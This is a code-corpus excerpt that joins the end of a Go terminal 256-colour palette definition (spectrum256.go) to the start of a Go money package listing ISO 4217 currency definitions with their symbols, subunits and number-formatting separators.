	coldef256[&Color256DeepPink3Light] = RGB{215, 0, 135}
	coldef256[&Color256Magenta3Dark] = RGB{215, 0, 175}
	coldef256[&Color256Magenta3Light] = RGB{215, 0, 215}
	coldef256[&Color256Magenta2Dark] = RGB{215, 0, 255}
	coldef256[&Color256DarkOrange3Light] = RGB{215, 95, 0}
	coldef256[&Color256IndianRedLight] = RGB{215, 95, 95}
	coldef256[&Color256HotPink3Light] = RGB{215, 95, 135}
	coldef256[&Color256HotPink2] = RGB{215, 95, 175}
	coldef256[&Color256Orchid] = RGB{215, 95, 215}
	coldef256[&Color256MediumOrchid1Dark] = RGB{215, 95, 255}
	coldef256[&Color256Orange3] = RGB{215, 135, 0}
	coldef256[&Color256LightSalmon3Light] = RGB{215, 135, 95}
	coldef256[&Color256LightPink3] = RGB{215, 135, 135}
	coldef256[&Color256Pink3] = RGB{215, 135, 175}
	coldef256[&Color256Plum3] = RGB{215, 135, 215}
	coldef256[&Color256Violet] = RGB{215, 135, 255}
	coldef256[&Color256Gold3Light] = RGB{215, 175, 0}
	coldef256[&Color256LightGoldenrod3] = RGB{215, 175, 95}
	coldef256[&Color256Tan] = RGB{215, 175, 135}
	coldef256[&Color256MistyRose3] = RGB{215, 175, 175}
	coldef256[&Color256Thistle3] = RGB{215, 175, 215}
	coldef256[&Color256Plum2] = RGB{215, 175, 255}
	coldef256[&Color256Yellow3Light] = RGB{215, 215, 0}
	coldef256[&Color256Khaki3] = RGB{215, 215, 95}
	coldef256[&Color256LightGoldenrod2] = RGB{215, 215, 135}
	coldef256[&Color256LightYellow3] = RGB{215, 215, 175}
	coldef256[&Color256Grey84] = RGB{215, 215, 215}
	coldef256[&Color256LightSteelBlue1] = RGB{215, 215, 255}
	coldef256[&Color256Yellow2] = RGB{215, 255, 0}
	coldef256[&Color256DarkOliveGreen1Dark] = RGB{215, 255, 95}
	coldef256[&Color256DarkOliveGreen1Light] = RGB{215, 255, 135}
	coldef256[&Color256DarkSeaGreen1Light] = RGB{215, 255, 175}
	coldef256[&Color256Honeydew2] = RGB{215, 255, 215}
	coldef256[&Color256LightCyan1] = RGB{215, 255, 255}
	coldef256[&Color256Red1] = RGB{255, 0, 0}
	coldef256[&Color256DeepPink2] = RGB{255, 0, 95}
	coldef256[&Color256DeepPink1Dark] = RGB{255, 0, 135}
	coldef256[&Color256DeepPink1Light] = RGB{255, 0, 175}
	coldef256[&Color256Magenta2Light] = RGB{255, 0, 215}
	coldef256[&Color256Magenta1] = RGB{255, 0, 255}
	coldef256[&Color256OrangeRed1] = RGB{255, 95, 0}
	coldef256[&Color256IndianRed1Dark] = RGB{255, 95, 95}
	coldef256[&Color256IndianRed1Light] = RGB{255, 95, 135}
	coldef256[&Color256HotPinkDark] = RGB{255, 95, 175}
	coldef256[&Color256HotPinkLight] = RGB{255, 95, 215}
	coldef256[&Color256MediumOrchid1Light] = RGB{255, 95, 255}
	coldef256[&Color256DarkOrange] = RGB{255, 135, 0}
	coldef256[&Color256Salmon1] = RGB{255, 135, 95}
	coldef256[&Color256LightCoral] = RGB{255, 135, 135}
	coldef256[&Color256PaleVioletRed1] = RGB{255, 135, 175}
	coldef256[&Color256Orchid2] = RGB{255, 135, 215}
	coldef256[&Color256Orchid1] = RGB{255, 135, 255}
	coldef256[&Color256Orange1] = RGB{255, 175, 0}
	coldef256[&Color256SandyBrown] = RGB{255, 175, 95}
	coldef256[&Color256LightSalmon1] = RGB{255, 175, 135}
	coldef256[&Color256LightPink1] = RGB{255, 175, 175}
	coldef256[&Color256Pink1] = RGB{255, 175, 215}
	coldef256[&Color256Plum1] = RGB{255, 175, 255}
	coldef256[&Color256Gold1] = RGB{255, 215, 0}
	// NOTE(review): &Color256LightGoldenrod2 is assigned three times in this function ((215, 215, 135) above, then the two entries below); only the last value survives — these are three distinct palette colors that likely need distinct variables.
	coldef256[&Color256LightGoldenrod2] = RGB{255, 215, 95}
	coldef256[&Color256LightGoldenrod2] = RGB{255, 215, 135}
	coldef256[&Color256NavajoWhite1] = RGB{255, 215, 175}
	coldef256[&Color256MistyRose1] = RGB{255, 215, 215}
	coldef256[&Color256Thistle1] = RGB{255, 215, 255}
	coldef256[&Color256Yellow1] = RGB{255, 255, 0}
	coldef256[&Color256LightGoldenrod1] = RGB{255, 255, 95}
	coldef256[&Color256Khaki1] = RGB{255, 255, 135}
	coldef256[&Color256Wheat1] = RGB{255, 255, 175}
	coldef256[&Color256Cornsilk1] = RGB{255, 255, 215}
	coldef256[&Color256Grey100] = RGB{255, 255, 255}
	// The 24-step greyscale ramp (palette indices 232-255).
	coldef256[&Color256Grey3] = RGB{8, 8, 8}
	coldef256[&Color256Grey7] = RGB{18, 18, 18}
	coldef256[&Color256Grey11] = RGB{28, 28, 28}
	coldef256[&Color256Grey15] = RGB{38, 38, 38}
	coldef256[&Color256Grey19] = RGB{48, 48, 48}
	coldef256[&Color256Grey23] = RGB{58, 58, 58}
	coldef256[&Color256Grey27] = RGB{68, 68, 68}
	coldef256[&Color256Grey30] = RGB{78, 78, 78}
	coldef256[&Color256Grey35] = RGB{88, 88, 88}
	coldef256[&Color256Grey39] = RGB{98, 98, 98}
	coldef256[&Color256Grey42] = RGB{108, 108, 108}
	coldef256[&Color256Grey46] = RGB{118, 118, 118}
	coldef256[&Color256Grey50] = RGB{128, 128, 128}
	coldef256[&Color256Grey54] = RGB{138, 138, 138}
	coldef256[&Color256Grey58] = RGB{148, 148, 148}
	coldef256[&Color256Grey62] = RGB{158, 158, 158}
	coldef256[&Color256Grey66] = RGB{168, 168, 168}
	coldef256[&Color256Grey70] = RGB{178, 178, 178}
	coldef256[&Color256Grey74] = RGB{188, 188, 188}
	coldef256[&Color256Grey78] = RGB{198, 198, 198}
	coldef256[&Color256Grey82] = RGB{208, 208, 208}
	coldef256[&Color256Grey85] = RGB{218, 218, 218}
	coldef256[&Color256Grey89] = RGB{228, 228, 228}
	coldef256[&Color256Grey93] = RGB{238, 238, 238}
} | spectrum256.go | 0.656438 | 0.460168 | spectrum256.go | starcoder |
package money
// Currency represents a currency.
type Currency struct {
	// The full English name of the currency.
	Name string
	// The 3 char identifier of the currency (ISO 4217), e.g. "USD".
	IsoCode string
	// The symbol of the currency, e.g. "$".
	Symbol string
	// Is true if the symbol will be displayed before the amount.
	SymbolFirst bool
	// Number of subunits that compose the unit. For example USD is made of 100
	// cents, so SubunitToUnit is 100.
	SubunitToUnit int
	// Thousands separator used when formatting amounts.
	ThousandsSeparator rune
	// Decimal mark used when formatting amounts.
	DecimalMark rune
}
var (
// From Ruby Money:
// Money::Currency.each { |c| puts "#{c.iso_code} = Currency{Name: \"#{c.name}\", IsoCode: \"#{c.iso_code}\", Symbol: \"#{c.symbol}\", SymbolFirst: #{c.symbol_first}, SubunitToUnit: #{c.subunit_to_unit}, ThousandsSeparator: '#{c.thousands_separator}', DecimalMark: '#{c.decimal_mark}'}" }; nil
AED = Currency{Name: "United Arab Emirates Dirham", IsoCode: "AED", Symbol: "د.إ", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
AFN = Currency{Name: "Afghan Afghani", IsoCode: "AFN", Symbol: "؋", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ALL = Currency{Name: "Albanian Lek", IsoCode: "ALL", Symbol: "L", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
AMD = Currency{Name: "Armenian Dram", IsoCode: "AMD", Symbol: "դր.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ANG = Currency{Name: "Netherlands Antillean Gulden", IsoCode: "ANG", Symbol: "ƒ", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
AOA = Currency{Name: "An<NAME>", IsoCode: "AOA", Symbol: "Kz", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ARS = Currency{Name: "Argentine Peso", IsoCode: "ARS", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
AUD = Currency{Name: "Australian Dollar", IsoCode: "AUD", Symbol: "A$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
AWG = Currency{Name: "Aruban Florin", IsoCode: "AWG", Symbol: "ƒ", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
AZN = Currency{Name: "Azerbaijani Manat", IsoCode: "AZN", Symbol: "₼", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BAM = Currency{Name: "Bosnia and Herzegovina Convertible Mark", IsoCode: "BAM", Symbol: "КМ", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BBD = Currency{Name: "Barbadian Dollar", IsoCode: "BBD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BCH = Currency{Name: "Bitcoin Cash", IsoCode: "BCH", Symbol: "₿", SymbolFirst: false, SubunitToUnit: 100000000, ThousandsSeparator: ',', DecimalMark: '.'}
BDT = Currency{Name: "Bangladeshi Taka", IsoCode: "BDT", Symbol: "৳", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BGN = Currency{Name: "Bulgarian Lev", IsoCode: "BGN", Symbol: "лв.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BHD = Currency{Name: "Bahraini Dinar", IsoCode: "BHD", Symbol: "ب.د", SymbolFirst: true, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
BIF = Currency{Name: "Burundian Franc", IsoCode: "BIF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
BMD = Currency{Name: "Bermudian Dollar", IsoCode: "BMD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BND = Currency{Name: "Brunei Dollar", IsoCode: "BND", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BOB = Currency{Name: "Bolivian Boliviano", IsoCode: "BOB", Symbol: "Bs.", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BRL = Currency{Name: "Brazilian Real", IsoCode: "BRL", Symbol: "R$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
BSD = Currency{Name: "Bahamian Dollar", IsoCode: "BSD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BTC = Currency{Name: "Bitcoin", IsoCode: "BTC", Symbol: "₿", SymbolFirst: true, SubunitToUnit: 100000000, ThousandsSeparator: ',', DecimalMark: '.'}
BTN = Currency{Name: "Bhutanese Ngultrum", IsoCode: "BTN", Symbol: "Nu.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BWP = Currency{Name: "Botswana Pula", IsoCode: "BWP", Symbol: "P", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
BYN = Currency{Name: "Belarusian Ruble", IsoCode: "BYN", Symbol: "Br", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ' ', DecimalMark: ','}
BZD = Currency{Name: "Belize Dollar", IsoCode: "BZD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CAD = Currency{Name: "Canadian Dollar", IsoCode: "CAD", Symbol: "C$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CDF = Currency{Name: "Congolese Franc", IsoCode: "CDF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CHF = Currency{Name: "Swiss Franc", IsoCode: "CHF", Symbol: "CHF", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CLF = Currency{Name: "Unidad de Fomento", IsoCode: "CLF", Symbol: "UF", SymbolFirst: true, SubunitToUnit: 10000, ThousandsSeparator: '.', DecimalMark: ','}
CLP = Currency{Name: "Chilean Peso", IsoCode: "CLP", Symbol: "$", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: '.', DecimalMark: ','}
CNH = Currency{Name: "Chinese Renminbi Yuan Offshore", IsoCode: "CNH", Symbol: "¥", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CNY = Currency{Name: "Chinese Renminbi Yuan", IsoCode: "CNY", Symbol: "¥", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
COP = Currency{Name: "Colombian Peso", IsoCode: "COP", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
CRC = Currency{Name: "Costa Rican Colón", IsoCode: "CRC", Symbol: "₡", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
CUC = Currency{Name: "Cuban Convertible Peso", IsoCode: "CUC", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CUP = Currency{Name: "Cuban Peso", IsoCode: "CUP", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CVE = Currency{Name: "Cape Verdean Escudo", IsoCode: "CVE", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
CZK = Currency{Name: "Czech Koruna", IsoCode: "CZK", Symbol: "Kč", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ' ', DecimalMark: ','}
DJF = Currency{Name: "Djiboutian Franc", IsoCode: "DJF", Symbol: "Fdj", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
DKK = Currency{Name: "Dan<NAME>", IsoCode: "DKK", Symbol: "kr.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
DOP = Currency{Name: "Dominican Peso", IsoCode: "DOP", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
DZD = Currency{Name: "Algerian Dinar", IsoCode: "DZD", Symbol: "د.ج", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
EEK = Currency{Name: "Estonian Kroon", IsoCode: "EEK", Symbol: "KR", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
EGP = Currency{Name: "Egyptian Pound", IsoCode: "EGP", Symbol: "ج.م", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ERN = Currency{Name: "Eritrean Nakfa", IsoCode: "ERN", Symbol: "Nfk", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ETB = Currency{Name: "Ethiopian Birr", IsoCode: "ETB", Symbol: "Br", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
EUR = Currency{Name: "Euro", IsoCode: "EUR", Symbol: "€", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
FJD = Currency{Name: "Fijian Dollar", IsoCode: "FJD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
FKP = Currency{Name: "Falkland Pound", IsoCode: "FKP", Symbol: "£", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GBP = Currency{Name: "British Pound", IsoCode: "GBP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GBX = Currency{Name: "British Penny", IsoCode: "GBX", Symbol: "", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
GEL = Currency{Name: "Georgian Lari", IsoCode: "GEL", Symbol: "ლ", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GGP = Currency{Name: "Guernsey Pound", IsoCode: "GGP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GHS = Currency{Name: "Ghanaian Cedi", IsoCode: "GHS", Symbol: "₵", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GIP = Currency{Name: "Gibraltar Pound", IsoCode: "GIP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GMD = Currency{Name: "Gambian Dalasi", IsoCode: "GMD", Symbol: "D", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GNF = Currency{Name: "Guinean Franc", IsoCode: "GNF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
GTQ = Currency{Name: "Guatemalan Quetzal", IsoCode: "GTQ", Symbol: "Q", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
GYD = Currency{Name: "Guyanese Dollar", IsoCode: "GYD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
HKD = Currency{Name: "Hong Kong Dollar", IsoCode: "HKD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
HNL = Currency{Name: "Honduran Lempira", IsoCode: "HNL", Symbol: "L", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
HRK = Currency{Name: "Croatian Kuna", IsoCode: "HRK", Symbol: "kn", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
HTG = Currency{Name: "Haitian Gourde", IsoCode: "HTG", Symbol: "G", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
HUF = Currency{Name: "Hungarian Forint", IsoCode: "HUF", Symbol: "Ft", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ' ', DecimalMark: ','}
IDR = Currency{Name: "Indonesian Rupiah", IsoCode: "IDR", Symbol: "Rp", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
ILS = Currency{Name: "Israeli New Sheqel", IsoCode: "ILS", Symbol: "₪", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
IMP = Currency{Name: "Isle of Man Pound", IsoCode: "IMP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
INR = Currency{Name: "Indian Rupee", IsoCode: "INR", Symbol: "₹", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
IQD = Currency{Name: "Iraqi Dinar", IsoCode: "IQD", Symbol: "ع.د", SymbolFirst: false, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
IRR = Currency{Name: "Iranian Rial", IsoCode: "IRR", Symbol: "﷼", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
ISK = Currency{Name: "Icelandic Króna", IsoCode: "ISK", Symbol: "kr", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: '.', DecimalMark: ','}
JEP = Currency{Name: "Jersey Pound", IsoCode: "JEP", Symbol: "£", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
JMD = Currency{Name: "Jamaican Dollar", IsoCode: "JMD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
JOD = Currency{Name: "Jordanian Dinar", IsoCode: "JOD", Symbol: "د.ا", SymbolFirst: true, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
JPY = Currency{Name: "Japanese Yen", IsoCode: "JPY", Symbol: "¥", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
KES = Currency{Name: "<NAME>", IsoCode: "KES", Symbol: "KSh", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KGS = Currency{Name: "<NAME>", IsoCode: "KGS", Symbol: "som", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KHR = Currency{Name: "<NAME>", IsoCode: "KHR", Symbol: "៛", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KMF = Currency{Name: "Comorian Franc", IsoCode: "KMF", Symbol: "Fr", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
KPW = Currency{Name: "North Korean Won", IsoCode: "KPW", Symbol: "₩", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KRW = Currency{Name: "South Korean Won", IsoCode: "KRW", Symbol: "₩", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
KWD = Currency{Name: "<NAME>", IsoCode: "KWD", Symbol: "د.ك", SymbolFirst: true, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
KYD = Currency{Name: "Cayman Islands Dollar", IsoCode: "KYD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
KZT = Currency{Name: "<NAME>", IsoCode: "KZT", Symbol: "₸", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LAK = Currency{Name: "L<NAME>", IsoCode: "LAK", Symbol: "₭", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LBP = Currency{Name: "Lebanese Pound", IsoCode: "LBP", Symbol: "ل.ل", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LKR = Currency{Name: "Sri Lankan Rupee", IsoCode: "LKR", Symbol: "₨", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LRD = Currency{Name: "Liberian Dollar", IsoCode: "LRD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LSL = Currency{Name: "<NAME>", IsoCode: "LSL", Symbol: "L", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LTL = Currency{Name: "Lithuanian Litas", IsoCode: "LTL", Symbol: "Lt", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LVL = Currency{Name: "Latvian Lats", IsoCode: "LVL", Symbol: "Ls", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
LYD = Currency{Name: "<NAME>", IsoCode: "LYD", Symbol: "ل.د", SymbolFirst: false, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
MAD = Currency{Name: "<NAME>", IsoCode: "MAD", Symbol: "د.م.", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MDL = Currency{Name: "<NAME>", IsoCode: "MDL", Symbol: "L", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MGA = Currency{Name: "<NAME>", IsoCode: "MGA", Symbol: "Ar", SymbolFirst: true, SubunitToUnit: 5, ThousandsSeparator: ',', DecimalMark: '.'}
MKD = Currency{Name: "<NAME>", IsoCode: "MKD", Symbol: "ден", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MMK = Currency{Name: "<NAME>", IsoCode: "MMK", Symbol: "K", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MNT = Currency{Name: "Mongol<NAME>", IsoCode: "MNT", Symbol: "₮", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MOP = Currency{Name: "<NAME>", IsoCode: "MOP", Symbol: "P", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MRO = Currency{Name: "<NAME>", IsoCode: "MRO", Symbol: "UM", SymbolFirst: false, SubunitToUnit: 5, ThousandsSeparator: ',', DecimalMark: '.'}
MTL = Currency{Name: "<NAME>", IsoCode: "MTL", Symbol: "₤", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MUR = Currency{Name: "Mauritian Rupee", IsoCode: "MUR", Symbol: "₨", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MVR = Currency{Name: "Maldivian Rufiyaa", IsoCode: "MVR", Symbol: "MVR", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MWK = Currency{Name: "Malawian Kwacha", IsoCode: "MWK", Symbol: "MK", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MXN = Currency{Name: "Mexican Peso", IsoCode: "MXN", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MYR = Currency{Name: "Malaysian Ringgit", IsoCode: "MYR", Symbol: "RM", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
MZN = Currency{Name: "Mozambican Metical", IsoCode: "MZN", Symbol: "MTn", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
NAD = Currency{Name: "Namibian Dollar", IsoCode: "NAD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
NGN = Currency{Name: "Nigerian Naira", IsoCode: "NGN", Symbol: "₦", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
NIO = Currency{Name: "Nicaraguan Córdoba", IsoCode: "NIO", Symbol: "C$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
NOK = Currency{Name: "Norwegian Krone", IsoCode: "NOK", Symbol: "kr", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
NPR = Currency{Name: "Nepalese Rupee", IsoCode: "NPR", Symbol: "₨", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
NZD = Currency{Name: "New Zealand Dollar", IsoCode: "NZD", Symbol: "$", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
OMR = Currency{Name: "Omani Rial", IsoCode: "OMR", Symbol: "ر.ع.", SymbolFirst: true, SubunitToUnit: 1000, ThousandsSeparator: ',', DecimalMark: '.'}
PAB = Currency{Name: "Panamanian Balboa", IsoCode: "PAB", Symbol: "B/.", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PEN = Currency{Name: "Peruvian Sol", IsoCode: "PEN", Symbol: "S/", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PGK = Currency{Name: "Papua New Guinean Kina", IsoCode: "PGK", Symbol: "K", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PHP = Currency{Name: "Philippine Peso", IsoCode: "PHP", Symbol: "₱", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PKR = Currency{Name: "Pakistani Rupee", IsoCode: "PKR", Symbol: "₨", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
PLN = Currency{Name: "Polish Złoty", IsoCode: "PLN", Symbol: "zł", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ' ', DecimalMark: ','}
PYG = Currency{Name: "Paraguayan Guaraní", IsoCode: "PYG", Symbol: "₲", SymbolFirst: true, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
QAR = Currency{Name: "Qatari Riyal", IsoCode: "QAR", Symbol: "ر.ق", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
RON = Currency{Name: "Romanian Leu", IsoCode: "RON", Symbol: "Lei", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
RSD = Currency{Name: "Serbian Dinar", IsoCode: "RSD", Symbol: "РСД", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
RUB = Currency{Name: "Russian Ruble", IsoCode: "RUB", Symbol: "₽", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: '.', DecimalMark: ','}
RWF = Currency{Name: "Rwandan Franc", IsoCode: "RWF", Symbol: "FRw", SymbolFirst: false, SubunitToUnit: 1, ThousandsSeparator: ',', DecimalMark: '.'}
SAR = Currency{Name: "Saudi Riyal", IsoCode: "SAR", Symbol: "ر.س", SymbolFirst: true, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
SBD = Currency{Name: "Solomon Islands Dollar", IsoCode: "SBD", Symbol: "$", SymbolFirst: false, SubunitToUnit: 100, ThousandsSeparator: ',', DecimalMark: '.'}
